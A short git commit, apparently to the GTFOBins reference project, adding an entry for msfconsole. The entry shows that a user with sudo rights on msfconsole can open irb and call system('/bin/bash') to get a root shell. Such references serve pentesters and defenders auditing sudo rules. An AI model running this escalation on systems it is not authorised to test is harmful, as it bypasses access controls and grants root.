Add msfconsole

This commit is contained in:
巴都万 2022-08-05 23:48:55 +08:00
parent 1999e48052
commit ffac698574

8
_gtfobins/msfconsole.md Normal file
View File

@ -0,0 +1,8 @@
---
functions:
sudo:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/bash")
---